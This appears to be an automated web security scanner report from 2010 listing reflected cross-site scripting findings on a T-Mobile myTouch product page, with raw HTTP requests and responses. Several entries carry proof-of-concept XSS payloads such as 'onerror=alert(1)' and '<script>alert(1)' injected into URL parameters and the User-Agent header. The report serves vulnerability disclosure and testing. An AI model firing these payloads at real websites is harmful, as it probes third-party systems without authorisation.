1. Cross-site scripting (reflected)
1.1. http://es.mytouch.t-mobile.com/enes/products/mytouch-4g-lp [REST URL parameter 2]
1.2. http://es.mytouch.t-mobile.com/enes/products/mytouch-4g-lp [REST URL parameter 3]
1.4. http://es.mytouch.t-mobile.com/enes/products/mytouch-4g-lp [wt.mc_id parameter]
1.5. http://es.mytouch.t-mobile.com/enes/products/mytouch-4g-lp [wt.mc_id parameter]
1.6. http://es.mytouch.t-mobile.com/enes/products/mytouch-4g-lp [User-Agent HTTP header]
2. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/productsa4f89%253cscript Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:14 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3583 ************************* Time => 13:11:34.9010628 ------------------------- Url => http://mytouch.t-mobile ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:17 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3583 ************************* Time => 13:11:37.5842972 ------------------------- Url => http://mytouch.t-mobile ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:09 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3637 ************************* Time => 13:11:29.7217964 ------------------------- Url => http: ...[SNIP]... <img src=a onerror=alert(1) ------------------------- [HTTP_X_REWRITE_URL] => ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:04 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/html;charset=utf-8 Content-Length: 11327 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <!-- http://mytouch.t-mobile ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:03 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3631 ************************* Time => 13:11:23.8249208 ------------------------- Url => http: ...[SNIP]... <img src=a onerror=alert(1) ------------------------- [HTTP_X_REWRITE_URL] => ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)525d9<script>alert(1)< Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:10:11 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3590 ************************* Time => 13:11:32.2178284 ------------------------- Url => http: ...[SNIP]... ------------------------- UserAgent => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)525d9<script>alert(1)< ------------------------- MachineName => ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://es.mytouch.t |
Path: | /enes/products/mytouch-4g |
GET /enes/products/mytouch-4g Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: es.mytouch.t-mobile.com Cookie: WT_FPC=id=10.134.111.251 |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 21:09:28 GMT Server: Microsoft-IIS/6.0 Cache-Control: private X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Type: text/plain;charset=utf-8 Content-Length: 3549 ************************* Time => 13:10:48.8960730 ------------------------- Url => http: ...[SNIP]... |